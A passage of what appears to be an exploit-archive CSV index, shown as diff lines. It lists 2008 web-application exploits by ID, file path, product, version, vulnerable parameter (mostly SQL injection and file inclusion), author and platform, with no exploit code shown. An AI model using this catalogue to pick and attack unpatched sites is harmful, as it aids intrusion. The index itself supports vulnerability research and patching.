Vulnerabilities",2008-02-02,NBBN,webapps,php, +5037,exploits/php/webapps/5037.txt,"The Everything Development System Pre-1.0 - SQL Injection",2008-02-02,sub,webapps,php, +5039,exploits/php/webapps/5039.txt,"WordPress Plugin Wordspew - SQL Injection",2008-02-02,S@BUN,webapps,php, +5040,exploits/php/webapps/5040.txt,"BookmarkX script 2007 - 'topicid' SQL Injection",2008-02-02,S@BUN,webapps,php, +5041,exploits/php/webapps/5041.txt,"phpShop 0.8.1 - SQL Injection / Filter Bypass",2008-02-02,"the redc0ders",webapps,php, +5042,exploits/php/webapps/5042.txt,"BlogPHP 2 - 'id' Cross-Site Scripting / SQL Injection",2008-02-02,"Khashayar Fereidani",webapps,php, +5047,exploits/php/webapps/5047.txt,"Joomla! Component mosDirectory 2.3.2 - 'catid' SQL Injection",2008-02-03,GoLd_M,webapps,php, +5050,exploits/php/webapps/5050.pl,"A-Blog 2.0 - Cross-Site Scripting / SQL Injection",2008-02-03,"Khashayar Fereidani",webapps,php, +5053,exploits/php/webapps/5053.txt,"WordPress Plugin st_newsletter - SQL Injection",2008-02-03,S@BUN,webapps,php, +5055,exploits/php/webapps/5055.txt,"Joomla! Component com_Marketplace 1.1.1 - SQL Injection",2008-02-03,"SoSo H H",webapps,php, +5056,exploits/php/webapps/5056.txt,"ITechBids 5.0 - 'item_id' SQL Injection",2008-02-04,QTRinux,webapps,php, +5057,exploits/php/webapps/5057.txt,"XOOPS 2.0.18 - Local File Inclusion / URL Redirecting",2008-02-04,DSecRG,webapps,php, +5058,exploits/php/webapps/5058.txt,"Mambo Component 'com_awesom' 0.3.2 - 'listid' SQL Injection",2008-02-04,S@BUN,webapps,php, +5059,exploits/php/webapps/5059.txt,"Mambo Component Shambo2 - 'itemID' SQL Injection",2008-02-04,S@BUN,webapps,php, +5060,exploits/php/webapps/5060.txt,"VHD Web Pack 2.0 - 'index.php' Local File Inclusion",2008-02-04,DSecRG,webapps,php, +5061,exploits/php/webapps/5061.txt,"All Club CMS 0.0.1f - 'index.php' Local File Inclusion",2008-02-04,Trancek,webapps,php, +5062,exploits/php/webapps/5062.txt,"RMSOFT Gallery System 2.0 - 'id' SQL Injection",2008-02-05,you_kn0w,webapps,php, +5064,exploits/php/webapps/5064.txt,"All Club CMS 0.0.2 - 'index.php' SQL Injection",2008-02-05,ka0x,webapps,php, +5065,exploits/php/webapps/5065.txt,"PhotoKorn Gallery 1.543 - 'pic' SQL Injection",2008-02-05,you_kn0w,webapps,php, +5066,exploits/php/webapps/5066.php,"WordPress MU < 1.3.2 - active_plugins option Code Execution",2008-02-05,"Alexander Concha",webapps,php, +5068,exploits/php/webapps/5068.txt,"OpenSiteAdmin 0.9.1.1 - Multiple File Inclusions",2008-02-06,Trancek,webapps,php, +5070,exploits/php/webapps/5070.pl,"MyBulletinBoard (MyBB) 1.2.11 - 'private.php' SQL Injection (1)",2008-02-06,F,webapps,php, +5071,exploits/php/webapps/5071.txt,"Astanda Directory Project 1.2 - 'link_id' SQL Injection",2008-02-06,you_kn0w,webapps,php, +5072,exploits/php/webapps/5072.txt,"Joomla! Component Ynews 1.0.0 - 'id' SQL Injection",2008-02-06,Crackers_Child,webapps,php, +5073,exploits/php/webapps/5073.txt,"Mambo Component com_downloads - SQL Injection",2008-02-06,S@BUN,webapps,php, +5074,exploits/php/webapps/5074.php,"Mihalism Multi Host Download - 'Username' Blind SQL Injection",2008-02-06,Moubik,webapps,php, +5075,exploits/php/webapps/5075.txt,"osCommerce Addon Customer Testimonials 3.1 - SQL Injection",2008-02-07,"it's my",webapps,php, +5076,exploits/php/webapps/5076.txt,"Mambo Component Sermon 0.2 - 'gid' SQL Injection",2008-02-07,S@BUN,webapps,php, +5080,exploits/php/webapps/5080.txt,"Joomla! Component com_doc - SQL Injection",2008-02-07,S@BUN,webapps,php, +5081,exploits/php/webapps/5081.txt,"Joomla! Component com_noticias 1.0 - SQL Injection",2008-02-07,xcorpitx,webapps,php, +5082,exploits/php/webapps/5082.txt,"PowerNews 2.5.6 - Local File Inclusion",2008-02-08,DSecRG,webapps,php, +5083,exploits/php/webapps/5083.txt,"Joomla! Component NeoGallery 1.1 - SQL Injection",2008-02-08,S@BUN,webapps,php, +5084,exploits/php/webapps/5084.txt,"Mambo Component com_gallery - SQL Injection",2008-02-08,S@BUN,webapps,php, +5088,exploits/php/webapps/5088.py,"Limbo CMS 1.0.4.2 - 'Cuid' cookie Blind SQL Injection",2008-02-09,The:Paradox,webapps,php, +5089,exploits/php/webapps/5089.txt,"DomPHP 0.82 - 'index.php' Local File Inclusion",2008-02-09,Houssamix,webapps,php, +5090,exploits/php/webapps/5090.pl,"Open-Realty 2.4.3 - 'last_module' Remote Code Execution",2008-02-09,Iron,webapps,php, +5091,exploits/php/webapps/5091.pl,"Journalness 4.1 - 'last_module' Remote Code Execution",2008-02-09,Iron,webapps,php, +5094,exploits/php/webapps/5094.txt,"Mambo Component Comments 0.5.8.5g - SQL Injection",2008-02-09,CheebaHawk215,webapps,php, +5095,exploits/php/webapps/5095.txt,"PK-Designs PKs Movie Database 3.0.3 - Cross-Site Scripting / SQL Injection",2008-02-10,Houssamix,webapps,php, +5096,exploits/php/webapps/5096.txt,"ITechBids 6.0 - 'item_id' SQL Injection",2008-02-10,"SoSo H H",webapps,php, +5097,exploits/php/webapps/5097.txt,"SAPID CMF Build 87 - 'last_module' Remote Code Execution",2008-02-10,GoLd_M,webapps,php, +5098,exploits/php/webapps/5098.txt,"PacerCMS 0.6 - 'last_module' Remote Code Execution",2008-02-10,GoLd_M,webapps,php, +5099,exploits/php/webapps/5099.php,"Mix Systems CMS - 'parent/id' SQL Injection",2008-02-10,halkfild,webapps,php, +5101,exploits/php/webapps/5101.pl,"vKios 2.0.0 - 'cat' SQL Injection",2008-02-12,NTOS-Team,webapps,php, +5103,exploits/php/webapps/5103.txt,"Joomla! Component Rapid Recipe 1.6.5 - SQL Injection",2008-02-12,S@BUN,webapps,php, +5104,exploits/php/webapps/5104.txt,"Joomla! Component pcchess 0.8 - SQL Injection",2008-02-12,S@BUN,webapps,php, +5105,exploits/php/webapps/5105.pl,"AuraCMS 2.2 - 'albums' Pramater SQL Injection",2008-02-12,DNX,webapps,php, +5108,exploits/php/webapps/5108.txt,"Affiliate Market 0.1 Beta - 'Language' Local File Inclusion",2008-02-13,GoLd_M,webapps,php, +5109,exploits/php/webapps/5109.txt,"Joomla! Component xfaq 1.2 - 'aid' SQL Injection",2008-02-13,S@BUN,webapps,php, +5112,exploits/jsp/webapps/5112.txt,"jspwiki 2.4.104/2.5.139 - Multiple Vulnerabilities",2008-02-13,"BugSec LTD",webapps,jsp, +5114,exploits/php/webapps/5114.pl,"Affiliate Market 0.1 Beta - Cross-Site Scripting / SQL Injection",2008-02-14,"Khashayar Fereidani",webapps,php, +5115,exploits/php/webapps/5115.txt,"nuBoard 0.5 - 'ssid' SQL Injection",2008-02-14,"Khashayar Fereidani",webapps,php, +5116,exploits/php/webapps/5116.txt,"artmedic weblog 1.0 - Multiple Local File Inclusions",2008-02-14,muuratsalo,webapps,php, +5117,exploits/php/webapps/5117.txt,"Joomla! Component paxxgallery 0.2 - 'iid' SQL Injection",2008-02-14,S@BUN,webapps,php, +5118,exploits/php/webapps/5118.txt,"Joomla! Component MCQuiz 0.9 Final - 'tid' SQL Injection",2008-02-14,S@BUN,webapps,php, +5119,exploits/php/webapps/5119.txt,"Joomla! Component Quiz 0.81 - 'tid' SQL Injection",2008-02-14,S@BUN,webapps,php, +5120,exploits/php/webapps/5120.pl,"Joomla! Component mediaslide - 'albumnum' Blind SQL Injection",2008-02-14,Inphex,webapps,php, +5121,exploits/php/webapps/5121.txt,"LookStrike Lan Manager 0.9 - Local/Remote File Inclusion",2008-02-14,MhZ91,webapps,php, +5123,exploits/php/webapps/5123.txt,"Scribe 0.2 - 'index.php' Local File Inclusion",2008-02-14,muuratsalo,webapps,php, +5124,exploits/php/webapps/5124.txt,"freePHPgallery 0.6 - Cookie Local File Inclusion",2008-02-14,MhZ91,webapps,php, +5125,exploits/php/webapps/5125.txt,"PHP Live! 3.2.2 - 'questid' SQL Injection (1)",2008-02-14,Xar,webapps,php, +5126,exploits/php/webapps/5126.txt,"WordPress Plugin Simple Forum 2.0 < 2.1 - SQL Injection",2008-02-15,S@BUN,webapps,php, +5127,exploits/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10 < 1.11 - SQL Injection",2008-02-15,S@BUN,webapps,php, +5128,exploits/php/webapps/5128.txt,"Mambo Component Quran 1.1 - 'surano' SQL Injection",2008-02-15,Don,webapps,php, +5129,exploits/php/webapps/5129.txt,"TRUC 0.11.0 - 'download.php' Remote File Disclosure",2008-02-16,GoLd_M,webapps,php, +5130,exploits/php/webapps/5130.txt,"AuraCMS 1.62 - Multiple SQL Injections",2008-02-16,NTOS-Team,webapps,php, +5131,exploits/php/webapps/5131.pl,"Simple CMS 1.0.3 - 'area' SQL Injection",2008-02-16,JosS,webapps,php, +5132,exploits/php/webapps/5132.txt,"Joomla! Component jooget 2.6.8 - SQL Injection",2008-02-16,S@BUN,webapps,php, +5133,exploits/php/webapps/5133.txt,"Mambo Component Ricette 1.0 - SQL Injection",2008-02-16,S@BUN,webapps,php, +5134,exploits/php/webapps/5134.txt,"Joomla! Component com_galeria - SQL Injection",2008-02-16,S@BUN,webapps,php, +5135,exploits/php/webapps/5135.txt,"WordPress Plugin Photo album - SQL Injection",2008-02-16,S@BUN,webapps,php, +5136,exploits/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload",2008-02-17,ZoRLu,webapps,php, +5137,exploits/php/webapps/5137.txt,"XPWeb 3.3.2 - 'url' Remote File Disclosure",2008-02-17,GoLd_M,webapps,php, +5138,exploits/php/webapps/5138.txt,"Joomla! Component astatsPRO 1.0 - 'refer.php' SQL Injection",2008-02-18,ka0x,webapps,php, +5139,exploits/php/webapps/5139.txt,"Mambo Component Portfolio Manager 1.0 - 'categoryId' SQL Injection",2008-02-18,"it's my",webapps,php, +5140,exploits/php/webapps/5140.txt,"LightBlog 9.6 - 'Username' Local File Inclusion",2008-02-18,muuratsalo,webapps,php, +5145,exploits/php/webapps/5145.txt,"Joomla! Component com_pccookbook - 'user_id' SQL Injection",2008-02-18,S@BUN,webapps,php, +5146,exploits/php/webapps/5146.txt,"Joomla! Component com_clasifier - 'cat_id' SQL Injection",2008-02-18,S@BUN,webapps,php, +5147,exploits/php/webapps/5147.txt,"PHP-Nuke Module books SQL - 'cid' SQL Injection",2008-02-18,S@BUN,webapps,php, +5148,exploits/php/webapps/5148.txt,"XOOPS Module myTopics - 'articleId' SQL Injection",2008-02-18,S@BUN,webapps,php, +5149,exploits/php/webapps/5149.txt,"sCssBoard (Multiple Versions) - 'pwnpack' Remote s",2008-02-18,Inphex,webapps,php, +5154,exploits/php/webapps/5154.txt,"PHP-Nuke Module Sections - 'artid' SQL Injection",2008-02-19,S@BUN,webapps,php, +5155,exploits/php/webapps/5155.txt,"PHP-Nuke Module EasyContent - 'page_id' SQL Injection",2008-02-19,"Mehmet Ince",webapps,php, +5156,exploits/php/webapps/5156.txt,"RunCMS Module MyAnnonces - 'cid' SQL Injection",2008-02-19,S@BUN,webapps,php, +5157,exploits/php/webapps/5157.txt,"XOOPS Module eEmpregos - 'cid' SQL Injection",2008-02-19,S@BUN,webapps,php, +5158,exploits/php/webapps/5158.txt,"XOOPS Module Classifieds - 'cid' SQL Injection",2008-02-19,S@BUN,webapps,php, +5159,exploits/php/webapps/5159.txt,"PHP-Nuke Modules Okul 1.0 - 'okulid' SQL Injection",2008-02-20,"Mehmet Ince",webapps,php, +5160,exploits/php/webapps/5160.txt,"Joomla! Component Highwood Design hwdVideoShare - SQL Injection",2008-02-20,S@BUN,webapps,php, +5161,exploits/php/webapps/5161.txt,"PHP-Nuke Module Docum - 'artid' SQL Injection",2008-02-20,DamaR,webapps,php, +5162,exploits/php/webapps/5162.txt,"Globsy 1.0 - 'file' Remote File Disclosure",2008-02-20,GoLd_M,webapps,php, +5163,exploits/php/webapps/5163.txt,"PHP-Nuke Module Inhalt - 'cid' SQL Injection",2008-02-20,Crackers_Child,webapps,php, +5164,exploits/php/webapps/5164.php,"Woltlab Burning Board 3.0.x - Blind SQL Injection",2008-02-20,NBBN,webapps,php, +5165,exploits/php/webapps/5165.php,"PunBB 1.2.16 - Blind Password Recovery",2008-02-21,EpiBite,webapps,php, +5166,exploits/php/webapps/5166.html,"MultiCart 2.0 - 'productdetails.php' SQL Injection",2008-02-20,t0pP8uZz,webapps,php, +5168,exploits/php/webapps/5168.txt,"PHP-Nuke Modules Manuales 0.1 - 'cid' SQL Injection",2008-02-21,"Mehmet Ince",webapps,php, +5169,exploits/php/webapps/5169.txt,"PHP-Nuke Module Siir - 'id' SQL Injection",2008-02-21,S@BUN,webapps,php, +5170,exploits/php/webapps/5170.txt,"BeContent 031 - 'id' SQL Injection",2008-02-21,Cr@zy_King,webapps,php, +5171,exploits/php/webapps/5171.txt,"OSSIM 0.9.9rc5 - Cross-Site Scripting / SQL Injection",2008-02-21,"Marcin Kopec",webapps,php, +5172,exploits/php/webapps/5172.txt,"PHP-Nuke Module NukeC 2.1 - 'id_catg' SQL Injection",2008-02-21,DamaR,webapps,php, +5173,exploits/php/webapps/5173.txt,"phpQLAdmin 2.2.7 - Multiple Remote File Inclusions",2008-02-22,RoMaNcYxHaCkEr,webapps,php, +5174,exploits/php/webapps/5174.txt,"Quantum Game Library 0.7.2c - Remote File Inclusion",2008-02-22,RoMaNcYxHaCkEr,webapps,php, +5175,exploits/php/webapps/5175.txt,"PHPProfiles 4.5.2 Beta - 'body_comm.inc.php' Remote File Inclusion",2008-02-23,CraCkEr,webapps,php, +5176,exploits/php/webapps/5176.txt,"Quinsonnas Mail Checker 1.55 - 'footer.php' Remote File Inclusion",2008-02-23,GoLd_M,webapps,php, +5177,exploits/php/webapps/5177.txt,"Joomla! Component simple shop 2.0 - SQL Injection",2008-02-23,S@BUN,webapps,php, +5178,exploits/php/webapps/5178.txt,"Mambo Component garyscookbook 1.1.1 - SQL Injection",2008-02-23,S@BUN,webapps,php, +5179,exploits/php/webapps/5179.txt,"PHPUserBase 1.3b - 'unverified.inc.php' Local File Inclusion",2008-02-23,BeyazKurt,webapps,php, +5180,exploits/php/webapps/5180.txt,"PHPUserBase 1.3b - 'unverified.inc.php' Remote File Inclusion",2008-02-24,CraCkEr,webapps,php, +5181,exploits/php/webapps/5181.txt,"pigyard art Gallery - Multiple Vulnerabilities",2008-02-24,ZoRLu,webapps,php, +5182,exploits/php/webapps/5182.txt,"Portail Web PHP 2.5.1.1 - Multiple Inclusion Vulnerabilities",2008-02-24,GoLd_M,webapps,php, +5183,exploits/php/webapps/5183.txt,"PHP Download Manager 1.1 - Local File Inclusion",2008-02-24,BeyazKurt,webapps,php, +5185,exploits/asp/webapps/5185.txt,"PORAR WebBoard - 'question.asp' SQL Injection",2008-02-25,xcorpitx,webapps,asp, +5186,exploits/php/webapps/5186.txt,"PHP-Nuke Module Kose_Yazilari - 'artid' SQL Injection",2008-02-25,xcorpitx,webapps,php, +5187,exploits/asp/webapps/5187.txt,"MiniNuke 2.1 - 'uid' SQL Injection",2008-02-25,S@BUN,webapps,asp, +5189,exploits/php/webapps/5189.pl,"DBHcms 1.1.4 - 'code' Remote File Inclusion",2008-02-25,Iron,webapps,php, +5192,exploits/php/webapps/5192.pl,"Nukedit 4.9.x - Remote Create Admin",2008-02-26,r3dm0v3,webapps,php, +5194,exploits/php/webapps/5194.txt,"WordPress Plugin Sniplets 1.1.2 - Remote File Inclusion / Cross-Site Scripting / Remote Code Execution",2008-02-26,NBBN,webapps,php, +5195,exploits/php/webapps/5195.txt,"Mambo Component SimpleBoard 1.0.3 - 'catid' SQL Injection",2008-02-27,"it's my",webapps,php, +5196,exploits/php/webapps/5196.pl,"eazyPortal 1.0 - 'cookie' SQL Injection",2008-02-27,Iron,webapps,php, +5197,exploits/php/webapps/5197.txt,"GROUP-E 1.6.41 - 'head_auth.php' Remote File Inclusion",2008-02-27,CraCkEr,webapps,php, +5198,exploits/php/webapps/5198.txt,"Dream4 Koobi Pro 5.7 - 'categ' SQL Injection",2008-02-28,Cr@zy_King,webapps,php, +5199,exploits/php/webapps/5199.txt,"SiteBuilderElite 1.2 - Multiple Remote File Inclusions",2008-02-28,MhZ91,webapps,php, +5200,exploits/php/webapps/5200.txt,"Podcast Generator 1.0 Beta 2 - Remote File Inclusion / File Disclosure",2008-02-28,GoLd_M,webapps,php, +5202,exploits/php/webapps/5202.txt,"Barryvan Compo Manager 0.3 - Remote File Inclusion",2008-02-28,MhZ91,webapps,php, +5203,exploits/php/webapps/5203.txt,"PHP-Nuke Module My_eGallery 2.7.9 - SQL Injection",2008-02-28,"Aria-Security Team",webapps,php, +5204,exploits/php/webapps/5204.py,"Centreon 1.4.2.3 - 'get_image.php' Remote File Disclosure",2008-02-28,"Julien CAYSSOL",webapps,php, +5206,exploits/php/webapps/5206.txt,"Dream4 Koobi CMS 4.3.0 < 4.2.3 - 'categ' SQL Injection",2008-02-29,JosS,webapps,php, +5207,exploits/php/webapps/5207.txt,"Mambo Component com_Musica - 'id' SQL Injection",2008-03-01,"Aria-Security Team",webapps,php, +5208,exploits/php/webapps/5208.txt,"phpArcadeScript 3.0RC2 - 'userid' SQL Injection",2008-03-01,"SoSo H H",webapps,php, +5209,exploits/php/webapps/5209.txt,"phpComasy 0.8 - 'mod_project_id' SQL Injection",2008-03-01,Cr@zy_King,webapps,php, +5211,exploits/php/webapps/5211.txt,"Dynamic photo Gallery 1.02 - 'albumID' SQL Injection",2008-03-01,"Aria-Security Team",webapps,php, +5214,exploits/php/webapps/5214.txt,"Mitra Informatika Solusindo cart - SQL Injection",2008-03-04,bius,webapps,php, +5216,exploits/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 - 'sid' SQL Injection",2008-03-06,S@BUN,webapps,php, +5218,exploits/php/webapps/5218.txt,"XOOPS Module wfdownloads - 'cid' SQL Injection",2008-03-06,S@BUN,webapps,php, +5219,exploits/php/webapps/5219.php,"zKup CMS 2.0 < 2.3 - Remote Add Admin",2008-03-07,"Charles Fol",webapps,php, +5220,exploits/php/webapps/5220.php,"zKup CMS 2.0 < 2.3 - Arbitrary File Upload",2008-03-07,"Charles Fol",webapps,php, +5221,exploits/php/webapps/5221.txt,"Joomla! Component Candle 1.0 - 'cid' SQL Injection",2008-03-08,S@BUN,webapps,php, +5222,exploits/php/webapps/5222.txt,"QuickTicket 1.5 - 'qti_usr.php' SQL Injection",2008-03-09,croconile,webapps,php, +5223,exploits/php/webapps/5223.txt,"BM Classifieds 20080409 - Multiple SQL Injections",2008-03-09,xcorpitx,webapps,php, +5226,exploits/php/webapps/5226.txt,"Mambo Component eWriting 1.2.1 - 'cat' SQL Injection",2008-03-10,Don,webapps,php, +5231,exploits/php/webapps/5231.php,"phpMyNewsletter 0.8b5 - 'msg_id' SQL Injection",2008-03-10,"Charles Fol",webapps,php, +5232,exploits/php/webapps/5232.txt,"Mapbender 2.4.4 - 'mapFiler.php' Remote Code Execution",2008-03-11,"RedTeam Pentesting",webapps,php, +5233,exploits/php/webapps/5233.txt,"Mapbender 2.4.4 - 'gaz' SQL Injection",2008-03-11,"RedTeam Pentesting",webapps,php, +5234,exploits/php/webapps/5234.txt,"Bloo 1.00 - Multiple SQL Injections",2008-03-11,MhZ91,webapps,php, +5236,exploits/php/webapps/5236.txt,"phpBB Mod FileBase 2.0 - 'id' SQL Injection",2008-03-11,t0pP8uZz,webapps,php, +5237,exploits/php/webapps/5237.txt,"Joomla! Component ProductShowcase 1.5 - SQL Injection",2008-03-11,S@BUN,webapps,php, +5239,exploits/php/webapps/5239.php,"Danneo CMS 0.5.1 - Blind SQL Injection",2008-03-11,InATeam,webapps,php, +5240,exploits/php/webapps/5240.html,"QuickTalk Forum 1.6 - Blind SQL Injection",2008-03-12,t0pP8uZz,webapps,php, +5241,exploits/php/webapps/5241.txt,"XOOPS Module Gallery 0.2.2 - 'gid' SQL Injection",2008-03-12,S@BUN,webapps,php, +5242,exploits/php/webapps/5242.txt,"XOOPS Module My_eGallery 3.04 - 'gid' SQL Injection",2008-03-12,S@BUN,webapps,php, +5243,exploits/php/webapps/5243.txt,"Fully Modded phpBB - 'kb.php' SQL Injection",2008-03-12,TurkishWarriorr,webapps,php, +5244,exploits/php/webapps/5244.txt,"eXV2 Module bamaGalerie 3.03 - SQL Injection",2008-03-12,S@BUN,webapps,php, +5245,exploits/php/webapps/5245.txt,"XOOPS Module tutorials 2.1b - 'printpage.php' SQL Injection",2008-03-12,S@BUN,webapps,php, +5246,exploits/php/webapps/5246.txt,"EasyCalendar 4.0tr - Multiple Vulnerabilities",2008-03-12,JosS,webapps,php, +5247,exploits/php/webapps/5247.txt,"EasyGallery 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,webapps,php, +5252,exploits/php/webapps/5252.txt,"eXV2 Module MyAnnonces - 'lid' SQL Injection",2008-03-14,S@BUN,webapps,php, +5253,exploits/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - 'blog_id' SQL Injection",2008-03-14,S@BUN,webapps,php, +5254,exploits/php/webapps/5254.txt,"eXV2 Module Viso 2.0.4.3 - 'kid' SQL Injection",2008-03-14,S@BUN,webapps,php, +5255,exploits/php/webapps/5255.txt,"eXV2 Module WebChat 1.60 - 'roomid' SQL Injection",2008-03-14,S@BUN,webapps,php, +5256,exploits/php/webapps/5256.pl,"AuraCMS 2.2.1 - 'X-Forwarded-For' HTTP Header Blind SQL Injection",2008-03-14,NTOS-Team,webapps,php, +5260,exploits/php/webapps/5260.txt,"Fuzzylime CMS 3.01 - 'admindir' Remote File Inclusion",2008-03-14,irk4z,webapps,php, +5262,exploits/php/webapps/5262.txt,"mutiple timesheets 5.0 - Multiple Vulnerabilities",2008-03-16,JosS,webapps,php, +5263,exploits/php/webapps/5263.txt,"phpBP RC3 (2.204) FIX4 - SQL Injection",2008-03-16,irk4z,webapps,php, +5265,exploits/php/webapps/5265.txt,"Exero CMS 1.0.1 - 'theme' Multiple Local File Inclusions",2008-03-17,GoLd_M,webapps,php, +5266,exploits/php/webapps/5266.txt,"phpAuction GPL Enhanced 2.51 - Multiple Remote File Inclusions",2008-03-17,RoMaNcYxHaCkEr,webapps,php, +5267,exploits/php/webapps/5267.txt,"XOOPS Module Dictionary 0.94 - SQL Injection",2008-03-17,S@BUN,webapps,php, +5273,exploits/php/webapps/5273.txt,"Joomla! Component Acajoom 1.1.5 - SQL Injection",2008-03-18,fataku,webapps,php, +5274,exploits/asp/webapps/5274.txt,"KAPhotoservice - 'album.asp' SQL Injection",2008-03-18,JosS,webapps,asp, +5275,exploits/php/webapps/5275.txt,"Easy-Clanpage 2.2 - 'id' SQL Injection",2008-03-18,n3w7u,webapps,php, +5276,exploits/asp/webapps/5276.txt,"ASPapp Knowledge Base - 'CatId' SQL Injection (1)",2008-03-19,xcorpitx,webapps,asp, +5277,exploits/php/webapps/5277.txt,"Joomla! Component joovideo 1.2.2 - 'id' SQL Injection",2008-03-19,S@BUN,webapps,php, +5278,exploits/php/webapps/5278.txt,"Joomla! Component Alberghi 2.1.3 - 'id' SQL Injection",2008-03-19,S@BUN,webapps,php, +5279,exploits/php/webapps/5279.txt,"Mambo Component Accombo 1.x - 'id' SQL Injection",2008-03-19,S@BUN,webapps,php, +5280,exploits/php/webapps/5280.txt,"Joomla! Component Restaurante 1.0 - 'id' SQL Injection",2008-03-19,S@BUN,webapps,php, +5281,exploits/php/webapps/5281.php,"PEEL CMS 3.x - Admin Hash Extraction / Arbitrary File Upload",2008-03-19,"Charles Fol",webapps,php, +5285,exploits/php/webapps/5285.txt,"RunCMS Module section - 'artid' SQL Injection",2008-03-20,Cr@zy_King,webapps,php, +5286,exploits/asp/webapps/5286.txt,"ASPapp Knowledge Base - SQL Injection",2008-03-20,xcorpitx,webapps,asp, +5288,exploits/php/webapps/5288.txt,"phpAddressBook 2.11 - Multiple Local File Inclusions",2008-03-21,0x90,webapps,php, +5290,exploits/php/webapps/5290.txt,"RunCMS Module Photo 3.02 - 'cid' SQL Injection",2008-03-21,S@BUN,webapps,php, +5291,exploits/php/webapps/5291.txt,"D.E. Classifieds - 'cat_id' SQL Injection",2008-03-21,S@BUN,webapps,php, +5292,exploits/php/webapps/5292.py,"PostNuke 0.764 - Blind SQL Injection",2008-03-21,The:Paradox,webapps,php, +5293,exploits/php/webapps/5293.pl,"XLPortal 2.2.4 - 'Search' SQL Injection",2008-03-21,cOndemned,webapps,php, +5294,exploits/php/webapps/5294.txt,"Joomla! Component custompages 1.1 - Remote File Inclusion",2008-03-22,Sniper456,webapps,php, +5295,exploits/php/webapps/5295.pl,"PHP-Nuke Platinum 7.6.b.5 - 'dynamic_titles.php' SQL Injection",2008-03-22,Inphex,webapps,php, +5296,exploits/php/webapps/5296.txt,"Cuteflow Bin 1.5.0 - 'login.php' Local File Inclusion",2008-03-22,KnocKout,webapps,php, +5297,exploits/php/webapps/5297.txt,"Joomla! Component rekry 1.0.0 - 'op_id' SQL Injection",2008-03-23,Sniper456,webapps,php, +5298,exploits/php/webapps/5298.py,"Destar 0.2.2-5 - Arbitrary Add New User",2008-03-23,nonroot,webapps,php, +5299,exploits/php/webapps/5299.txt,"Joomla! Component d3000 1.0.0 - SQL Injection",2008-03-23,S@BUN,webapps,php, +5300,exploits/php/webapps/5300.txt,"Joomla! Component Cinema 1.0 - SQL Injection",2008-03-23,S@BUN,webapps,php, +5301,exploits/php/webapps/5301.txt,"phpBB Module XS-Mod 2.3.1 - Local File Inclusion",2008-03-24,bd0rk,webapps,php, +5302,exploits/php/webapps/5302.txt,"PowerBook 1.21 - 'index.php' Local File Inclusion",2008-03-24,DSecRG,webapps,php, +5303,exploits/php/webapps/5303.txt,"PowerPHPBoard 1.00b - Multiple Local File Inclusions",2008-03-24,DSecRG,webapps,php, +5304,exploits/cgi/webapps/5304.txt,"HIS-Webshop - 'his-webshop.pl t' Remote File Disclosure",2008-03-24,"Zero X",webapps,cgi, +5305,exploits/php/webapps/5305.py,"Destar 0.2.2-5 - Arbitrary Add Admin",2008-03-24,nonroot,webapps,php, +5308,exploits/php/webapps/5308.txt,"e107 Plugin My_Gallery 2.3 - Arbitrary File Download",2008-03-25,"Jerome Athias",webapps,php, +5309,exploits/php/webapps/5309.txt,"BolinOS 4.6.1 - Local File Inclusion / Cross-Site Scripting",2008-03-25,DSecRG,webapps,php, +5310,exploits/php/webapps/5310.txt,"Joomla! Component Alphacontent 2.5.8 - 'id' SQL Injection",2008-03-25,cO2,webapps,php, +5311,exploits/php/webapps/5311.txt,"TopperMod 2.0 - SQL Injection",2008-03-25,girex,webapps,php, +5312,exploits/php/webapps/5312.txt,"TopperMod 1.0 - 'mod.php' Local File Inclusion",2008-03-25,girex,webapps,php, +5317,exploits/php/webapps/5317.txt,"JAF CMS 4.0 RC2 - Multiple Remote File Inclusions",2008-03-26,CraCkEr,webapps,php, +5318,exploits/php/webapps/5318.txt,"Joomla! Component MyAlbum 1.0 - 'album' SQL Injection",2008-03-28,parad0x,webapps,php, +5319,exploits/php/webapps/5319.pl,"AuraCMS 2.x - '/user.php' Security Code Bypass / Arbitrary Add Administrator",2008-03-28,NTOS-Team,webapps,php, +5322,exploits/php/webapps/5322.txt,"Smoothflash - 'cid' SQL Injection",2008-03-30,S@BUN,webapps,php, +5323,exploits/php/webapps/5323.pl,"mxBB Module mx_blogs 2.0.0-beta - Remote File Inclusion",2008-03-30,bd0rk,webapps,php, +5324,exploits/php/webapps/5324.txt,"KISGB (tmp_theme) 5.1.1 - Local File Inclusion",2008-03-30,Cr@zy_King,webapps,php, +5325,exploits/php/webapps/5325.txt,"JShop 1.x < 2.x - 'xPage' Local File Inclusion",2008-03-30,v0l4arrra,webapps,php, +5326,exploits/php/webapps/5326.txt,"WordPress Plugin Download - 'dl_id' SQL Injection",2008-03-31,BL4CK,webapps,php, +5328,exploits/php/webapps/5328.txt,"PHPSpamManager 0.53b - 'body.php' Remote File Disclosure",2008-03-31,GoLd_M,webapps,php, +5329,exploits/php/webapps/5329.txt,"Woltlab Burning Board Addon JGS-Treffen 2.0.2 - SQL Injection",2008-03-31,anonymous,webapps,php, +5331,exploits/php/webapps/5331.pl,"Neat weblog 0.2 - 'articleId' SQL Injection",2008-03-31,"Khashayar Fereidani",webapps,php, +5333,exploits/php/webapps/5333.txt,"EasyNews 40tr - SQL Injection / Cross-Site Scripting / Local File Inclusion",2008-04-01,"Khashayar Fereidani",webapps,php, +5334,exploits/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - 'show.php' SQL Injection",2008-04-01,"Khashayar Fereidani",webapps,php, +5335,exploits/php/webapps/5335.txt,"Mambo Component Ahsshop 1.51 - 'vara' SQL Injection",2008-04-01,S@BUN,webapps,php, +5336,exploits/php/webapps/5336.pl,"EggBlog 4.0 - SQL Injection",2008-04-01,girex,webapps,php, +5337,exploits/php/webapps/5337.txt,"Joomla! Component actualite 1.0 - 'id' SQL Injection",2008-04-01,Stack,webapps,php, +5339,exploits/php/webapps/5339.php,"Nuked-klaN 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",webapps,php, +5340,exploits/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,webapps,php, +5345,exploits/php/webapps/5345.txt,"Joomla! Component OnlineFlashQuiz 1.0.2 - Remote File Inclusion",2008-04-02,NoGe,webapps,php, +5347,exploits/php/webapps/5347.txt,"DaZPHP 0.1 - 'prefixdir' Local File Inclusion",2008-04-02,w0cker,webapps,php, +5348,exploits/php/webapps/5348.txt,"PhpBlock a8.4 - 